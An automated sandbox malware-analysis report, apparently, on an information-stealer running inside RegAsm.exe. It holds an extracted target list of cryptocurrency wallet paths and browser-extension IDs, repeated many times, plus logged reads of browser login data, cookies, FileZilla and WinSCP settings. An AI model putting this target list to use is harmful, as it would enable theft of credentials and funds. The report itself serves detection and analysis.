                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|1|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|MetaMask|1|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|1|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|TronLink|1|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|BinanceChainWallet|1|fhbohimaelbohpjbbldcngcnapndodjp|1|1|0|Yoroi|1|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase|1|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|1|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|1|iWallet|1|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|RoninWallet|1|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|1|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CloverWallet|1|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|LiqualityWallet|1|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra_Station|1|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|1|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|AuroWallet|1|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|PolymeshWallet|1|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|1|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98|1|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|1|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain|1|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|1|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|1|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Oxygen (Atomic)|1|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|PaliWallet|1|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|NamiWallet|1|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Solflare|1|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|CyanoWallet|1|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|1|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|1|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Goby|1|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|RoninWalletEdge|1|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|UniSat Wallet|1|ppbibelpcjmhbdihakflkdcoccbgbkpo|1|0|0|Authenticator|0|bhghoamapcdpbohphigoooaddinpkbai|1|1|0|GAuth Authenticator|0|ilgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wal
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\\Coinomi\Coinomi\wallets\\*.config
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: Yara matchFile source: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.450000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 4092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D6D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,1_2_19D6D9E0
